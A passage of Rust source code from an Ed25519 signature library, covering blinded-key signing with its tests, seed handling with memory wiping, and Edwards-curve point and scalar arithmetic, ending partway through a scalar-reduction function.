            sc_reduce(&mut hram);
            // S = nonce + H(R || A || M) * blind_scalar (mod L), overwriting
            // the temporary public-key copy.
            sc_muladd(
                &mut signature[32..64],
                &hram[0..32],
                &self.blind_scalar,
                &nonce[0..32],
            );
            let signature = Signature(signature);
            #[cfg(feature = "self-verify")]
            {
                PublicKey::from_slice(&self.blind_pk.0)
                    .expect("Key length changed")
                    .verify(message, &signature)
                    .expect("Newly created signature cannot be verified");
            }
            signature
        }
    }

    impl Drop for BlindSecretKey {
        // Best-effort zeroization of the secret parts on drop.
        fn drop(&mut self) {
            Mem::wipe(&mut self.prefix);
            Mem::wipe(&mut self.blind_scalar);
        }
    }

    impl PublicKey {
        /// Returns a blind version of the public key.
        pub fn blind(&self, blind: &Blind, ctx: impl AsRef<[u8]>) -> Result<BlindPublicKey, Error> {
            // Blinding factor from SHA-512(blind || 0x00 || ctx); the 0x00
            // byte separates the blind from the context string.
            let (blind_factor, _prefix2) = {
                let mut hx = sha512::Hash::new();
                hx.update(&blind[..]);
                hx.update([0u8]);
                hx.update(ctx.as_ref());
                let hash_output = hx.finalize();
                KeyPair::split(&hash_output, true, false)
            };
            let pk_p3 = GeP3::from_bytes_vartime(&self.0).ok_or(Error::InvalidPublicKey)?;
            Ok(BlindPublicKey(
                ge_scalarmult(&blind_factor, &pk_p3).to_bytes(),
            ))
        }
    }

    impl KeyPair {
        /// Returns a blind version of the key pair.
        pub fn blind(&self, blind: &Blind, ctx: impl AsRef<[u8]>) -> BlindKeyPair {
            let seed = self.sk.seed();
            // Regular Ed25519 secret-scalar expansion from the seed.
            let (scalar, prefix1) = {
                let hash_output = sha512::Hash::hash(&seed[..]);
                KeyPair::split(&hash_output, false, true)
            };
            // Blinding factor and extra nonce prefix from (blind, ctx).
            let (blind_factor, prefix2) = {
                let mut hx = sha512::Hash::new();
                hx.update(&blind[..]);
                hx.update([0u8]);
                hx.update(ctx.as_ref());
                let hash_output = hx.finalize();
                KeyPair::split(&hash_output, true, false)
            };
            let blind_scalar = sc_mul(&scalar, &blind_factor);
            let blind_pk = ge_scalarmult_base(&blind_scalar).to_bytes();
            let mut prefix = [0u8; 2 * Seed::BYTES];
            prefix[0..32].copy_from_slice(&prefix1);
            prefix[32..64].copy_from_slice(&prefix2);
            let blind_pk = BlindPublicKey::new(blind_pk);
            BlindKeyPair {
                blind_pk,
                blind_sk: BlindSecretKey {
                    prefix,
                    blind_scalar,
                    blind_pk,
                },
            }
        }
    }
}
#[cfg(feature = "blind-keys")]
pub use blind_keys::*;
#[test]
#[cfg(all(feature = "blind-keys", feature = "random"))]
fn test_blind_ed25519() {
    use ct_codecs::{Decoder, Hex};

    // Round trip: sign under a blinded key, verify under the blind public
    // key, then unblind and check we recover the original public key.
    let kp = KeyPair::generate();
    let blind = Blind::new([69u8; 32]);
    let blind_kp = kp.blind(&blind, "ctx");
    let message = b"Hello, World!";
    let signature = blind_kp.blind_sk.sign(message, None);
    assert!(blind_kp.blind_pk.verify(message, &signature).is_ok());
    let recovered_pk = blind_kp.blind_pk.unblind(&blind, "ctx").unwrap();
    assert!(recovered_pk == kp.pk);

    // Known-answer vectors: fixed seed, fixed blind, fixed context.
    let kp = KeyPair::from_seed(
        Seed::from_slice(
            &Hex::decode_to_vec(
                "875532ab039b0a154161c284e19c74afa28d5bf5454e99284bbcffaa71eebf45",
                None,
            )
            .unwrap(),
        )
        .unwrap(),
    );
    assert_eq!(
        Hex::decode_to_vec(
            "3b5983605b277cd44918410eb246bb52d83adfc806ccaa91a60b5b2011bc5973",
            None
        )
        .unwrap(),
        kp.pk.as_ref()
    );
    let blind = Blind::from_slice(
        &Hex::decode_to_vec(
            "c461e8595f0ac41d374f878613206704978115a226f60470ffd566e9e6ae73bf",
            None,
        )
        .unwrap(),
    )
    .unwrap();
    let blind_kp = kp.blind(&blind, "ctx");
    assert_eq!(
        Hex::decode_to_vec(
            "246dcd43930b81d5e4d770db934a9fcd985b75fd014bc2a98b0aea02311c1836",
            None
        )
        .unwrap(),
        blind_kp.blind_pk.as_ref()
    );
    // Message is the hex encoding of "hello world".
    let message = Hex::decode_to_vec("68656c6c6f20776f726c64", None).unwrap();
    let signature = blind_kp.blind_sk.sign(message, None);
    assert_eq!(Hex::decode_to_vec("947bacfabc63448f8955dc20630e069e58f37b72bb433ae17f2fa904ea860b44deb761705a3cc2168a6673ee0b41ff7765c7a4896941eec6833c1689315acb0b",
        None).unwrap(), signature.as_ref());
}
#[cfg(feature = "random")]
#[test]
fn test_streaming() {
    // Sign "message" absorbed in two chunks, then verify it re-chunked at a
    // different boundary: incremental hashing must be split-invariant.
    let kp = KeyPair::generate();

    let mut signer = kp.sk.sign_incremental(Noise::default());
    signer.absorb("mes");
    signer.absorb("sage");
    let signature = signer.sign();

    let mut checker = kp.pk.verify_incremental(&signature).unwrap();
    checker.absorb("mess");
    checker.absorb("age");
    assert!(checker.verify().is_ok());
}
#[test]
#[cfg(feature = "random")]
fn test_ed25519_invalid_keypair() {
    let kp1 = KeyPair::generate();
    let kp2 = KeyPair::generate();

    // Mismatched secret/public halves must be rejected, in both directions.
    let err = kp1.sk.validate_public_key(&kp2.pk).unwrap_err();
    assert_eq!(err, Error::InvalidPublicKey);
    let err = kp2.sk.validate_public_key(&kp1.pk).unwrap_err();
    assert_eq!(err, Error::InvalidPublicKey);

    // Matching halves and whole key pairs must validate.
    assert!(kp1.sk.validate_public_key(&kp1.pk).is_ok());
    assert!(kp2.sk.validate_public_key(&kp2.pk).is_ok());
    assert!(kp1.validate().is_ok());
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/common.rs | src/common.rs | use core::ops::{Deref, DerefMut};
use core::ptr;
use core::sync::atomic;
use super::error::Error;
/// A seed, which a key pair can be derived from.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct Seed([u8; Seed::BYTES]); // 32 bytes of raw key material
impl From<[u8; 32]> for Seed {
    // Infallible conversion from an owned 32-byte array.
    fn from(seed: [u8; 32]) -> Self {
        Seed(seed)
    }
}
impl Seed {
    /// Number of raw bytes in a seed.
    pub const BYTES: usize = 32;

    /// Creates a seed from raw bytes.
    pub fn new(seed: [u8; Seed::BYTES]) -> Self {
        Seed(seed)
    }

    /// Creates a seed from a slice.
    ///
    /// Returns `Error::InvalidSeed` if the slice is not exactly
    /// `Seed::BYTES` long.
    pub fn from_slice(seed: &[u8]) -> Result<Self, Error> {
        if seed.len() != Seed::BYTES {
            return Err(Error::InvalidSeed);
        }
        let mut bytes = [0u8; Seed::BYTES];
        bytes.copy_from_slice(seed);
        Ok(Seed::new(bytes))
    }

    /// Tentatively overwrite the content of the seed with zeros.
    pub fn wipe(self) {
        let mut this = self;
        Mem::wipe(&mut this.0)
    }

    /// Overwrite the content of the seed with zeros in-place.
    pub fn wipe_mut(&mut self) {
        Mem::wipe(&mut self.0)
    }
}
#[cfg(feature = "random")]
impl Default for Seed {
    /// Generates a random seed.
    fn default() -> Self {
        let mut seed = [0u8; Seed::BYTES];
        // Fill from the OS RNG; a failure here is unrecoverable.
        getrandom::fill(&mut seed).expect("RNG failure");
        Seed(seed)
    }
}
#[cfg(feature = "random")]
impl Seed {
    /// Generates a random seed.
    // Convenience alias for `Seed::default()`.
    pub fn generate() -> Self {
        Seed::default()
    }
}
impl Deref for Seed {
    type Target = [u8; Seed::BYTES];

    /// Returns a seed as raw bytes.
    // Enables `&seed[..]`-style access to the underlying array.
    fn deref(&self) -> &Self::Target {
        &self.0
    }
}
impl DerefMut for Seed {
    /// Returns a seed as mutable raw bytes.
    fn deref_mut(&mut self) -> &mut Self::Target {
        &mut self.0
    }
}
// Marker type grouping crate-internal memory-wiping helpers.
pub(crate) struct Mem;

impl Mem {
    /// Best-effort secure wipe: overwrites every element of `x` with its
    /// default value using volatile writes, then issues compiler and CPU
    /// fences so the stores cannot be elided or reordered away.
    #[inline]
    pub fn wipe<T: Default>(x: &mut [T]) {
        for i in 0..x.len() {
            unsafe {
                // SAFETY: `i < x.len()`, so `as_mut_ptr().add(i)` stays within
                // the slice allocation and is valid for a write of `T`.
                ptr::write_volatile(x.as_mut_ptr().add(i), T::default());
            }
        }
        atomic::compiler_fence(atomic::Ordering::SeqCst);
        atomic::fence(atomic::Ordering::SeqCst);
    }
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/edwards25519.rs | src/edwards25519.rs | use core::cmp::min;
use core::ops::{Add, Sub};
use super::error::*;
use super::field25519::*;
#[derive(Clone, Copy)]
pub struct GeP2 {
    // Projective coordinates: the affine point is (x/z, y/z).
    x: Fe,
    y: Fe,
    z: Fe,
}

#[derive(Clone, Copy)]
pub struct GeP3 {
    // Extended coordinates: affine (x/z, y/z) with an auxiliary product
    // coordinate t (set to x*y with z = 1 by point decompression below).
    x: Fe,
    y: Fe,
    z: Fe,
    t: Fe,
}

#[derive(Clone, Copy, Default)]
pub struct GeP1P1 {
    // "Completed" intermediate form produced by additions/doublings;
    // converted to a usable representation via to_p2()/to_p3().
    x: Fe,
    y: Fe,
    z: Fe,
    t: Fe,
}

#[derive(Clone, Copy)]
pub struct GePrecomp {
    // Precomputed point for mixed addition — presumably the affine values
    // (y+x, y-x, 2*d*x*y); see the `BI` table used by verification.
    y_plus_x: Fe,
    y_minus_x: Fe,
    xy2d: Fe,
}

#[derive(Clone, Copy, Default)]
pub struct GeCached {
    // Cached projective point (y+x, y-x, z, t*2d) — see GeP3::to_cached().
    y_plus_x: Fe,
    y_minus_x: Fe,
    z: Fe,
    t2d: Fe,
}
impl GeCached {
    /// Branch-free conditional assignment: overwrites `self` with `other`
    /// when `do_swap` is 1 and leaves it unchanged when 0, delegating to
    /// `Fe::maybe_set` per coordinate (assumed constant-time; defined in
    /// field25519). Used for constant-time table lookups in ge_scalarmult.
    pub fn maybe_set(&mut self, other: &GeCached, do_swap: u8) {
        self.y_plus_x.maybe_set(&other.y_plus_x, do_swap);
        self.y_minus_x.maybe_set(&other.y_minus_x, do_swap);
        self.z.maybe_set(&other.z, do_swap);
        self.t2d.maybe_set(&other.t2d, do_swap);
    }
}
impl GeP1P1 {
    // Completes the addition/doubling result into projective (P2) form.
    fn to_p2(&self) -> GeP2 {
        GeP2 {
            x: self.x * self.t,
            y: self.y * self.z,
            z: self.z * self.t,
        }
    }

    // Completes the result into extended (P3) form; costs one extra field
    // multiplication compared to to_p2().
    fn to_p3(&self) -> GeP3 {
        GeP3 {
            x: self.x * self.t,
            y: self.y * self.z,
            z: self.z * self.t,
            t: self.x * self.y,
        }
    }
}
impl From<GeP2> for GeP3 {
    fn from(p: GeP2) -> GeP3 {
        GeP3 {
            x: p.x,
            y: p.y,
            z: p.z,
            // NOTE(review): t = x*y is only the correct extended coordinate
            // when z == 1 — confirm at call sites.
            t: p.x * p.y,
        }
    }
}
impl GeP2 {
    /// The neutral element (0, 1) in projective coordinates.
    fn zero() -> GeP2 {
        GeP2 {
            x: FE_ZERO,
            y: FE_ONE,
            z: FE_ONE,
        }
    }

    /// Point doubling, producing the intermediate P1P1 representation.
    fn dbl(&self) -> GeP1P1 {
        let xx = self.x.square();
        let yy = self.y.square();
        let b = self.z.square_and_double();
        let a = self.x + self.y;
        let aa = a.square();
        let y3 = yy + xx;
        let z3 = yy - xx;
        let x3 = aa - y3;
        let t3 = b - z3;
        GeP1P1 {
            x: x3,
            y: y3,
            z: z3,
            t: t3,
        }
    }

    /// Recodes a 256-bit little-endian scalar into a signed sliding-window
    /// form: each non-zero digit is odd and in [-15, 15], with zero runs
    /// between digits, so only odd multiples of the point are needed.
    fn slide(a: &[u8]) -> [i8; 256] {
        // Start from the plain bit decomposition.
        let mut r = [0i8; 256];
        for i in 0..256 {
            r[i] = (1 & (a[i >> 3] >> (i & 7))) as i8;
        }
        // Greedily merge neighboring bits into wider signed digits.
        for i in 0..256 {
            if r[i] != 0 {
                for b in 1..min(7, 256 - i) {
                    if r[i + b] != 0 {
                        if r[i] + (r[i + b] << b) <= 15 {
                            r[i] += r[i + b] << b;
                            r[i + b] = 0;
                        } else if r[i] - (r[i + b] << b) >= -15 {
                            r[i] -= r[i + b] << b;
                            // Negative digit: propagate a carry into the
                            // next zero bit above.
                            for k in i + b..256 {
                                if r[k] == 0 {
                                    r[k] = 1;
                                    break;
                                }
                                r[k] = 0;
                            }
                        } else {
                            break;
                        }
                    }
                }
            }
        }
        r
    }

    /// Computes `a_scalar * a_point + b_scalar * B` in variable time, where B
    /// is the point precomputed in the `BI` table. Timing depends on the
    /// scalars, so this must only be used with public inputs (verification).
    #[allow(clippy::comparison_chain)]
    pub fn double_scalarmult_vartime(a_scalar: &[u8], a_point: GeP3, b_scalar: &[u8]) -> GeP2 {
        let aslide = GeP2::slide(a_scalar);
        let bslide = GeP2::slide(b_scalar);
        // Odd multiples of a_point for the signed digits: ai[i] = (2i+1)*A.
        let mut ai = [GeCached {
            y_plus_x: FE_ZERO,
            y_minus_x: FE_ZERO,
            z: FE_ZERO,
            t2d: FE_ZERO,
        }; 8]; // A,3A,5A,7A,9A,11A,13A,15A
        ai[0] = a_point.to_cached();
        let a2 = a_point.dbl().to_p3();
        ai[1] = (a2 + ai[0]).to_p3().to_cached();
        ai[2] = (a2 + ai[1]).to_p3().to_cached();
        ai[3] = (a2 + ai[2]).to_p3().to_cached();
        ai[4] = (a2 + ai[3]).to_p3().to_cached();
        ai[5] = (a2 + ai[4]).to_p3().to_cached();
        ai[6] = (a2 + ai[5]).to_p3().to_cached();
        ai[7] = (a2 + ai[6]).to_p3().to_cached();
        let mut r = GeP2::zero();
        // Skip leading zero digits of both scalars.
        let mut i: usize = 255;
        loop {
            if aslide[i] != 0 || bslide[i] != 0 {
                break;
            }
            if i == 0 {
                return r;
            }
            i -= 1;
        }
        // Double-and-add over the remaining digits, from high to low.
        loop {
            let mut t = r.dbl();
            if aslide[i] > 0 {
                t = t.to_p3() + ai[(aslide[i] / 2) as usize];
            } else if aslide[i] < 0 {
                t = t.to_p3() - ai[(-aslide[i] / 2) as usize];
            }
            if bslide[i] > 0 {
                t = t.to_p3() + BI[(bslide[i] / 2) as usize];
            } else if bslide[i] < 0 {
                t = t.to_p3() - BI[(-bslide[i] / 2) as usize];
            }
            r = t.to_p2();
            if i == 0 {
                return r;
            }
            i -= 1;
        }
    }
}
impl GeP3 {
    /// Decompresses a 32-byte point encoding (little-endian y with the sign
    /// of x in the top bit), returning the point with x *negated* relative
    /// to the encoding. Variable-time; only for public inputs.
    pub fn from_bytes_negate_vartime(s: &[u8; 32]) -> Option<GeP3> {
        let y = Fe::from_bytes(s);
        let z = FE_ONE;
        // Recover x from the curve equation: x^2 = (y^2 - 1) / (d*y^2 + 1).
        let y_squared = y.square();
        let u = y_squared - FE_ONE;
        let v = (y_squared * FE_D) + FE_ONE;
        let mut x = (u * v).pow25523() * u;
        let vxx = x.square() * v;
        let check = vxx - u;
        if !check.is_zero() {
            // The candidate root may be off by a factor of sqrt(-1).
            let check2 = vxx + u;
            if !check2.is_zero() {
                // Not a quadratic residue: invalid encoding.
                return None;
            }
            x = x * FE_SQRTM1;
        }
        // Flip x so that its sign is the opposite of the encoded sign bit.
        if x.is_negative() == ((s[31] >> 7) != 0) {
            x = x.neg();
        }
        let t = x * y;
        Some(GeP3 { x, y, z, t })
    }

    /// Decompresses a point encoding, undoing the negation performed by
    /// `from_bytes_negate_vartime`.
    pub fn from_bytes_vartime(s: &[u8; 32]) -> Option<GeP3> {
        Self::from_bytes_negate_vartime(s).map(|p| GeP3 {
            x: p.x.neg(),
            y: p.y,
            z: p.z,
            t: p.t.neg(),
        })
    }

    // Drops the t coordinate.
    fn to_p2(&self) -> GeP2 {
        GeP2 {
            x: self.x,
            y: self.y,
            z: self.z,
        }
    }

    // Precomputes the values used by the mixed addition formulas.
    fn to_cached(&self) -> GeCached {
        GeCached {
            y_plus_x: self.y + self.x,
            y_minus_x: self.y - self.x,
            z: self.z,
            t2d: self.t * FE_D2,
        }
    }

    /// The neutral element (0, 1) in extended coordinates.
    fn zero() -> GeP3 {
        GeP3 {
            x: FE_ZERO,
            y: FE_ONE,
            z: FE_ONE,
            t: FE_ZERO,
        }
    }

    fn dbl(&self) -> GeP1P1 {
        self.to_p2().dbl()
    }

    /// Compresses the point to 32 bytes: little-endian affine y, with the
    /// sign of affine x stored in the top bit.
    pub fn to_bytes(&self) -> [u8; 32] {
        let recip = self.z.invert();
        let x = self.x * recip;
        let y = self.y * recip;
        let mut bs = y.to_bytes();
        bs[31] ^= (if x.is_negative() { 1 } else { 0 }) << 7;
        bs
    }

    /// Returns true for low-order (torsion) points: affine x == 0, y == 0,
    /// or y * sqrt(-1) == ±x.
    pub fn has_small_order(&self) -> bool {
        let recip = self.z.invert();
        let x = self.x * recip;
        let y = self.y * recip;
        let x_neg = x.neg();
        let y_sqrtm1 = y * FE_SQRTM1;
        x.is_zero() | y.is_zero() | (y_sqrtm1 == x) | (y_sqrtm1 == x_neg)
    }
}
impl Add<GeP3> for GeP3 {
    type Output = GeP3;

    // Full point addition: routed through the cached representation.
    fn add(self, other: GeP3) -> GeP3 {
        (self + other.to_cached()).to_p3()
    }
}

impl Sub<GeP3> for GeP3 {
    type Output = GeP3;

    // Full point subtraction: routed through the cached representation.
    fn sub(self, other: GeP3) -> GeP3 {
        (self - other.to_cached()).to_p3()
    }
}
impl Add<GeCached> for GeP3 {
    type Output = GeP1P1;

    // Mixed addition P3 + cached -> P1P1, using the precomputed
    // (y+x, y-x, z, t*2d) values of the cached operand.
    fn add(self, _rhs: GeCached) -> GeP1P1 {
        let y1_plus_x1 = self.y + self.x;
        let y1_minus_x1 = self.y - self.x;
        let a = y1_plus_x1 * _rhs.y_plus_x;
        let b = y1_minus_x1 * _rhs.y_minus_x;
        let c = _rhs.t2d * self.t;
        let zz = self.z * _rhs.z;
        let d = zz + zz;
        let x3 = a - b;
        let y3 = a + b;
        let z3 = d + c;
        let t3 = d - c;
        GeP1P1 {
            x: x3,
            y: y3,
            z: z3,
            t: t3,
        }
    }
}
impl Add<GePrecomp> for GeP3 {
    type Output = GeP1P1;

    // Mixed addition with a precomputed (affine-style) point: same as the
    // cached case but without the z multiplication (z is implicitly 1).
    fn add(self, _rhs: GePrecomp) -> GeP1P1 {
        let y1_plus_x1 = self.y + self.x;
        let y1_minus_x1 = self.y - self.x;
        let a = y1_plus_x1 * _rhs.y_plus_x;
        let b = y1_minus_x1 * _rhs.y_minus_x;
        let c = _rhs.xy2d * self.t;
        let d = self.z + self.z;
        let x3 = a - b;
        let y3 = a + b;
        let z3 = d + c;
        let t3 = d - c;
        GeP1P1 {
            x: x3,
            y: y3,
            z: z3,
            t: t3,
        }
    }
}
impl Sub<GeCached> for GeP3 {
    type Output = GeP1P1;

    // Mixed subtraction: identical to addition with the (y+x, y-x) pair
    // swapped and the sign of the c term flipped in z3/t3.
    fn sub(self, _rhs: GeCached) -> GeP1P1 {
        let y1_plus_x1 = self.y + self.x;
        let y1_minus_x1 = self.y - self.x;
        let a = y1_plus_x1 * _rhs.y_minus_x;
        let b = y1_minus_x1 * _rhs.y_plus_x;
        let c = _rhs.t2d * self.t;
        let zz = self.z * _rhs.z;
        let d = zz + zz;
        let x3 = a - b;
        let y3 = a + b;
        let z3 = d - c;
        let t3 = d + c;
        GeP1P1 {
            x: x3,
            y: y3,
            z: z3,
            t: t3,
        }
    }
}
impl Sub<GePrecomp> for GeP3 {
    type Output = GeP1P1;

    // Mixed subtraction with a precomputed point (z implicitly 1).
    fn sub(self, _rhs: GePrecomp) -> GeP1P1 {
        let y1_plus_x1 = self.y + self.x;
        let y1_minus_x1 = self.y - self.x;
        let a = y1_plus_x1 * _rhs.y_minus_x;
        let b = y1_minus_x1 * _rhs.y_plus_x;
        let c = _rhs.xy2d * self.t;
        let d = self.z + self.z;
        let x3 = a - b;
        let y3 = a + b;
        let z3 = d - c;
        let t3 = d + c;
        GeP1P1 {
            x: x3,
            y: y3,
            z: z3,
            t: t3,
        }
    }
}
// Builds the window table pc[i] = i * base for i in 0..16 (pc[0] is the
// identity), in cached form for fast constant-time mixed additions.
fn ge_precompute(base: &GeP3) -> [GeCached; 16] {
    let base_cached = base.to_cached();
    let mut pc = [GeP3::zero(); 16];
    pc[1] = *base;
    for i in 2..16 {
        pc[i] = if i % 2 == 0 {
            // 2k*base = double(k*base)
            pc[i / 2].dbl().to_p3()
        } else {
            // (k+1)*base = k*base + base
            pc[i - 1].add(base_cached).to_p3()
        }
    }
    let mut pc_cached: [GeCached; 16] = Default::default();
    for i in 0..16 {
        pc_cached[i] = pc[i].to_cached();
    }
    pc_cached
}
/// Constant-time scalar multiplication `scalar * base` using a fixed 4-bit
/// window, consuming the (little-endian) scalar from bit 252 downwards.
pub fn ge_scalarmult(scalar: &[u8], base: &GeP3) -> GeP3 {
    let pc = ge_precompute(base);
    let mut q = GeP3::zero();
    let mut pos = 252;
    loop {
        // Current 4-bit window of the scalar.
        let slot = ((scalar[pos >> 3] >> (pos & 7)) & 15) as usize;
        // Branch-free table lookup: the mask is 1 exactly when slot == i
        // ((slot ^ i) - 1 underflows only for slot == i).
        let mut t = pc[0];
        for i in 1..16 {
            t.maybe_set(&pc[i], (((slot ^ i).wrapping_sub(1)) >> 8) as u8 & 1);
        }
        q = q.add(t).to_p3();
        if pos == 0 {
            break;
        }
        // Shift the accumulator up by 4 bits before the next window.
        q = q.dbl().to_p3().dbl().to_p3().dbl().to_p3().dbl().to_p3();
        pos -= 4;
    }
    q
}
/// Multiplies `scalar` by the curve's standard base point, whose affine
/// coordinates are hard-coded below in little-endian byte form.
pub fn ge_scalarmult_base(scalar: &[u8]) -> GeP3 {
    // Affine x of the base point.
    const BXP: [u8; 32] = [
        0x1a, 0xd5, 0x25, 0x8f, 0x60, 0x2d, 0x56, 0xc9, 0xb2, 0xa7, 0x25, 0x95, 0x60, 0xc7, 0x2c,
        0x69, 0x5c, 0xdc, 0xd6, 0xfd, 0x31, 0xe2, 0xa4, 0xc0, 0xfe, 0x53, 0x6e, 0xcd, 0xd3, 0x36,
        0x69, 0x21,
    ];
    // Affine y of the base point.
    const BYP: [u8; 32] = [
        0x58, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66,
        0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66,
        0x66, 0x66,
    ];
    let bx = Fe::from_bytes(&BXP);
    let by = Fe::from_bytes(&BYP);
    // z = 1, so the extended coordinate is simply t = x*y.
    let base = GeP3 {
        x: bx,
        y: by,
        z: FE_ONE,
        t: bx * by,
    };
    ge_scalarmult(scalar, &base)
}
#[cfg(feature = "x25519")]
// Converts an Edwards point encoding to the X25519 (Montgomery) u-coordinate
// via the birational map u = (1 + y) / (1 - y). Variable-time.
pub fn ge_to_x25519_vartime(s: &[u8; 32]) -> Option<[u8; 32]> {
    let p = GeP3::from_bytes_vartime(s)?;
    let yed = p.y;
    let x_mont = (FE_ONE + yed) * ((FE_ONE - yed).invert());
    Some(x_mont.to_bytes())
}
/// Reduces a 32-byte little-endian value modulo the group order, in place.
pub fn sc_reduce32(s: &mut [u8; 32]) {
    // Widen to the 64-byte form sc_reduce expects (high half zero), reduce,
    // then copy the 32-byte result back.
    let mut wide = [0u8; 64];
    wide[..32].copy_from_slice(&s[..]);
    sc_reduce(&mut wide);
    s.copy_from_slice(&wide[..32]);
}
/// Reduces a 64-byte little-endian value in `s` modulo the group order,
/// in place; the result occupies `s[0..32]`. The value is unpacked into
/// 24 limbs of 21 bits; the constants 666643, 470296, 654183, 997805,
/// 136657, 683901 fold high limbs back down using the group order's
/// low part (ref10-style arithmetic, no secret-dependent branches).
pub fn sc_reduce(s: &mut [u8]) {
    // Unpack 24 21-bit limbs from the 64 input bytes.
    let mut s0: i64 = 2097151 & load_3i(s);
    let mut s1: i64 = 2097151 & (load_4i(&s[2..6]) >> 5);
    let mut s2: i64 = 2097151 & (load_3i(&s[5..8]) >> 2);
    let mut s3: i64 = 2097151 & (load_4i(&s[7..11]) >> 7);
    let mut s4: i64 = 2097151 & (load_4i(&s[10..14]) >> 4);
    let mut s5: i64 = 2097151 & (load_3i(&s[13..16]) >> 1);
    let mut s6: i64 = 2097151 & (load_4i(&s[15..19]) >> 6);
    let mut s7: i64 = 2097151 & (load_3i(&s[18..21]) >> 3);
    let mut s8: i64 = 2097151 & load_3i(&s[21..24]);
    let mut s9: i64 = 2097151 & (load_4i(&s[23..27]) >> 5);
    let mut s10: i64 = 2097151 & (load_3i(&s[26..29]) >> 2);
    let mut s11: i64 = 2097151 & (load_4i(&s[28..32]) >> 7);
    let mut s12: i64 = 2097151 & (load_4i(&s[31..35]) >> 4);
    let mut s13: i64 = 2097151 & (load_3i(&s[34..37]) >> 1);
    let mut s14: i64 = 2097151 & (load_4i(&s[36..40]) >> 6);
    let mut s15: i64 = 2097151 & (load_3i(&s[39..42]) >> 3);
    let mut s16: i64 = 2097151 & load_3i(&s[42..45]);
    let mut s17: i64 = 2097151 & (load_4i(&s[44..48]) >> 5);
    let s18: i64 = 2097151 & (load_3i(&s[47..50]) >> 2);
    let s19: i64 = 2097151 & (load_4i(&s[49..53]) >> 7);
    let s20: i64 = 2097151 & (load_4i(&s[52..56]) >> 4);
    let s21: i64 = 2097151 & (load_3i(&s[55..58]) >> 1);
    let s22: i64 = 2097151 & (load_4i(&s[57..61]) >> 6);
    let s23: i64 = load_4i(&s[60..64]) >> 3;
    // Fold the six highest limbs (s18..s23) down into s6..s16.
    s11 += s23 * 666643;
    s12 += s23 * 470296;
    s13 += s23 * 654183;
    s14 -= s23 * 997805;
    s15 += s23 * 136657;
    s16 -= s23 * 683901;
    s10 += s22 * 666643;
    s11 += s22 * 470296;
    s12 += s22 * 654183;
    s13 -= s22 * 997805;
    s14 += s22 * 136657;
    s15 -= s22 * 683901;
    s9 += s21 * 666643;
    s10 += s21 * 470296;
    s11 += s21 * 654183;
    s12 -= s21 * 997805;
    s13 += s21 * 136657;
    s14 -= s21 * 683901;
    s8 += s20 * 666643;
    s9 += s20 * 470296;
    s10 += s20 * 654183;
    s11 -= s20 * 997805;
    s12 += s20 * 136657;
    s13 -= s20 * 683901;
    s7 += s19 * 666643;
    s8 += s19 * 470296;
    s9 += s19 * 654183;
    s10 -= s19 * 997805;
    s11 += s19 * 136657;
    s12 -= s19 * 683901;
    s6 += s18 * 666643;
    s7 += s18 * 470296;
    s8 += s18 * 654183;
    s9 -= s18 * 997805;
    s10 += s18 * 136657;
    s11 -= s18 * 683901;
    // Carry propagation: even limbs first, then odd limbs.
    let mut carry6: i64 = (s6 + (1 << 20)) >> 21;
    s7 += carry6;
    s6 -= carry6 << 21;
    let mut carry8: i64 = (s8 + (1 << 20)) >> 21;
    s9 += carry8;
    s8 -= carry8 << 21;
    let mut carry10: i64 = (s10 + (1 << 20)) >> 21;
    s11 += carry10;
    s10 -= carry10 << 21;
    let carry12: i64 = (s12 + (1 << 20)) >> 21;
    s13 += carry12;
    s12 -= carry12 << 21;
    let carry14: i64 = (s14 + (1 << 20)) >> 21;
    s15 += carry14;
    s14 -= carry14 << 21;
    let carry16: i64 = (s16 + (1 << 20)) >> 21;
    s17 += carry16;
    s16 -= carry16 << 21;
    let mut carry7: i64 = (s7 + (1 << 20)) >> 21;
    s8 += carry7;
    s7 -= carry7 << 21;
    let mut carry9: i64 = (s9 + (1 << 20)) >> 21;
    s10 += carry9;
    s9 -= carry9 << 21;
    let mut carry11: i64 = (s11 + (1 << 20)) >> 21;
    s12 += carry11;
    s11 -= carry11 << 21;
    let carry13: i64 = (s13 + (1 << 20)) >> 21;
    s14 += carry13;
    s13 -= carry13 << 21;
    let carry15: i64 = (s15 + (1 << 20)) >> 21;
    s16 += carry15;
    s15 -= carry15 << 21;
    // Fold the next band of limbs (s12..s17) down into s0..s10.
    s5 += s17 * 666643;
    s6 += s17 * 470296;
    s7 += s17 * 654183;
    s8 -= s17 * 997805;
    s9 += s17 * 136657;
    s10 -= s17 * 683901;
    s4 += s16 * 666643;
    s5 += s16 * 470296;
    s6 += s16 * 654183;
    s7 -= s16 * 997805;
    s8 += s16 * 136657;
    s9 -= s16 * 683901;
    s3 += s15 * 666643;
    s4 += s15 * 470296;
    s5 += s15 * 654183;
    s6 -= s15 * 997805;
    s7 += s15 * 136657;
    s8 -= s15 * 683901;
    s2 += s14 * 666643;
    s3 += s14 * 470296;
    s4 += s14 * 654183;
    s5 -= s14 * 997805;
    s6 += s14 * 136657;
    s7 -= s14 * 683901;
    s1 += s13 * 666643;
    s2 += s13 * 470296;
    s3 += s13 * 654183;
    s4 -= s13 * 997805;
    s5 += s13 * 136657;
    s6 -= s13 * 683901;
    s0 += s12 * 666643;
    s1 += s12 * 470296;
    s2 += s12 * 654183;
    s3 -= s12 * 997805;
    s4 += s12 * 136657;
    s5 -= s12 * 683901;
    s12 = 0;
    // Carry propagation across the low 12 limbs, collecting overflow in s12.
    let mut carry0: i64 = (s0 + (1 << 20)) >> 21;
    s1 += carry0;
    s0 -= carry0 << 21;
    let mut carry2: i64 = (s2 + (1 << 20)) >> 21;
    s3 += carry2;
    s2 -= carry2 << 21;
    let mut carry4: i64 = (s4 + (1 << 20)) >> 21;
    s5 += carry4;
    s4 -= carry4 << 21;
